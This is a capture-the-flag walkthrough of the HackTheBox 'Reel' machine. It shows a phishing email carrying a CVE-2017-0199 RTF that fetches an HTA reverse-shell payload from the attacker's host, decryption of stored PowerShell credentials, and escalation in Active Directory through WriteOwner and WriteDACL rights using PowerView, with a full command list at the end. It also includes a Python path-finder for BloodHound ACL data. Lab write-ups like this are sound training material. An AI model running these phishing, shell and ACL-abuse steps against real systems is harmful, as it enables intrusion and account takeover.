We covered the HackTheBox Reel machine, which is part of the pwn with Metasploit track. We demonstrated CVE-2017-0199, a Microsoft Office vulnerability, and performed privilege escalation in Active Directory through several methods, including PowerShell runas and abuse of WriteOwner and WriteDACL rights over objects.
Reel is a medium-to-hard difficulty machine that requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
Initial Enumeration
I started with an Nmap scan which revealed open ports like 21 (FTP), 22 (SSH), and 25 (SMTP). The scan also indicated the target was likely a Windows Server 2012 R2 machine.
FTP Exploitation
I logged into the FTP server using anonymous credentials (anonymous/anonymous). I downloaded several files from the "documents" directory.
Metadata Analysis
Using exiftool on one of the downloaded Microsoft Office documents, I found an email address: Nico@megabank.com.
SMTP Enumeration
Knowing there was an SMTP server and having an email address, I decided to enumerate for more valid email addresses. I created a wordlist of potential email addresses based on the discovered domains (megabank.com and real.htb). I used an SMTP user enumeration tool (from pentestmonkey) to verify these email addresses. Several addresses, including Nico@real.htb and admin@real.htb, were confirmed to exist.
Phishing Attack with Metasploit
I decided to use a known vulnerability (CVE-2017-0199) related to Microsoft Office documents. Using Metasploit, I generated a malicious RTF document that, when opened, would execute an HTA payload. This HTA payload was hosted on my machine and designed to establish a reverse shell. I configured the Metasploit module with my IP address and specific ports for the HTA server and the reverse shell listener. I then sent this malicious document as an email attachment to Nico@real.htb using the sendemail command-line tool.
Initial Shell and User Flag
Once Nico opened the attachment, I received a Meterpreter session. I navigated to Nico's user directory and found the user flag and a file named cred.xml.
Credential Extraction
The cred.xml file contained stored PowerShell credentials for a user named "Tom" in a secure format. I used a PowerShell command to import and decrypt these credentials, revealing Tom's plain-text password.
Pivoting to Tom via SSH
I used Tom’s credentials to log in via SSH. In Tom’s desktop directory, I found a “note” file and BloodHound data, hinting at Active Directory enumeration.
Active Directory Enumeration (Manual Analysis)
I explained that, due to updates in BloodHound, the provided CSV files wouldn't work directly with newer versions. I manually analyzed the CSV data (specifically acls.csv) to find relationships and permissions. I discovered that Tom had WriteOwner rights over an object named "Claire."
Privilege Escalation (Tom to Claire)
Using PowerView (a PowerShell tool for Active Directory enumeration and exploitation), I leveraged Tom's WriteOwner permission over Claire: I made Tom the owner of Claire's object, granted Tom the ResetPassword right, and then reset Claire's password. I then logged in as Claire using the new password.
Privilege Escalation (Claire to Backup Admins)
Analyzing the CSV data again, I found that Claire had WriteDACL permissions over the "Backup Admins" group. I used this permission to add Claire to the "Backup Admins" group.
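The manual acls.csv review described in the two enumeration steps above (Tom's WriteOwner over Claire, then Claire's WriteDACL over Backup Admins) can be turned into a small graph search. This is an added example, not code from the writeup or from BloodHound; the column names follow the legacy BloodHound 1.x acls.csv layout as an assumption, and the principal names and rows are constructed.

```python
import csv
import io
from collections import deque

# Constructed sample in the legacy BloodHound 1.x acls.csv layout (column names are an
# assumption about that format); the principals and rights below are made up for the demo.
SAMPLE_ACLS_CSV = """ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@example.local,USER,tom@example.local,USER,WriteOwner,,AccessAllowed,False
backup admins@example.local,GROUP,claire@example.local,USER,WriteDacl,,AccessAllowed,False
administrator@example.local,USER,domain admins@example.local,GROUP,GenericAll,,AccessAllowed,True
tom@example.local,USER,helpdesk@example.local,GROUP,ExtendedRight,User-Force-Change-Password,AccessAllowed,False
nico@example.local,USER,nico@example.local,USER,ReadProperty,,AccessAllowed,False
"""

# Rights that let the holder take over the target object: the two the writeup abuses plus the usual suspects.
DANGEROUS_RIGHTS = {"WriteOwner", "WriteDacl", "GenericAll", "GenericWrite", "AllExtendedRights"}
# Extended rights worth flagging; for these the right name lives in the ACEType column.
DANGEROUS_EXTENDED = {"User-Force-Change-Password", "DS-Replication-Get-Changes-All"}

def load_edges(csv_text):
    """Return {principal: [(right, object), ...]} for allowed, non-self, abusable ACEs."""
    edges = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue
        rights = {r.strip() for r in row["ActiveDirectoryRights"].split(",")}
        if "ExtendedRight" in rights:          # concrete extended right is in ACEType
            rights.discard("ExtendedRight")
            rights.add(row["ACEType"])
        rights &= DANGEROUS_RIGHTS | DANGEROUS_EXTENDED
        principal, obj = row["PrincipalName"].lower(), row["ObjectName"].lower()
        if principal == obj:                   # rights over yourself are not an escalation
            continue
        for right in sorted(rights):
            edges.setdefault(principal, []).append((right, obj))
    return edges

def find_path(edges, start, target):
    """Breadth-first search over ACE edges; returns [(principal, right, object), ...] or None."""
    start, target = start.lower(), target.lower()
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        for right, obj in edges.get(node, []):
            step = path + [(node, right, obj)]
            if obj == target:
                return step
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, step))
    return None

if __name__ == "__main__":
    graph = load_edges(SAMPLE_ACLS_CSV)
    for who, right, what in find_path(graph, "tom@example.local", "backup admins@example.local") or []:
        print(f"{who} --{right}--> {what}")
```

Run against a real export, the same search lists every low-privilege principal with a chain of ACE edges to a high-value group, which is the audit a defender wants before an attacker does it.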
Final Privilege Escalation (Backup Admins to Administrator)
After logging out and back in as Claire (to update group memberships), I confirmed Claire was part of "Backup Admins." I found that the "Backup Admins" group had full control over the Administrator's directory. Inside a backup script (backup_script.ps1) located in a "backup_scripts" folder, I found the plain-text password for the Administrator account.
Root Flag
I used the Administrator’s password to SSH into the machine as Administrator and retrieved the root flag.
Technical Commands
ftp <IP>
anonymous (as FTP username)
anonymous (as FTP password)
dir
cd documents
mget *
exit (from FTP)
cd real
exiftool <filename>
telnet <IP> 25
helo Nico@megabank.com
mail from: Nico@megabank.com
quit (from telnet)
nano maillist
smtp-user-enum.pl -M RCPT -U maillist -t <IP>
msfconsole
search office
use exploit/windows/fileformat/office_word_hta
options
set FILENAME invoice.doc
ifconfig
set SRVHOST <attacker_IP>
set SRVPORT 8080
set LHOST <attacker_IP>
set LPORT 4445
run
sendemail -f myname@example.com -t Nico@real.htb -u "Invoice Attached" -m "You are overdue for payment" -a /path/to/invoice.doc -s <target_IP>
sessions
sessions -i 1
pwd (within meterpreter)
shell (within meterpreter)
cd c:\users
dir (within Windows shell)
whoami
cd Nico
cd Desktop
type user.txt
type cred.xml
powershell -C "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential().Password"
ssh Tom@<target_IP>
cd Desktop
cd "Active Directory Audit"
type note.txt
powershell
. .\PowerView.ps1
Set-DomainObjectOwner -Identity Claire -OwnerIdentity Tom
Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword
$pass = ConvertTo-SecureString 'P@$$WOrd123!' -AsPlainText -Force (single quotes, so PowerShell does not expand $$ inside the string; $pwd is avoided because it is an automatic variable)
Set-DomainUserPassword -Identity Claire -AccountPassword $pass
exit (from Tom's SSH session)
ssh Claire@<target_IP>
Add-NetGroupUser -UserName Claire -GroupName "Backup Admins"
net group "Backup Admins"
exit (from Claire's SSH session)
ssh Claire@<target_IP> (logging back in)
net group "Backup Admins"
icacls C:\Users\Administrator
cd C:\Users\Administrator\Desktop
type root.txt
cd ..\backup_scripts
type backup_script.ps1
ssh Administrator@<target_IP>
cd Desktop
type root.txt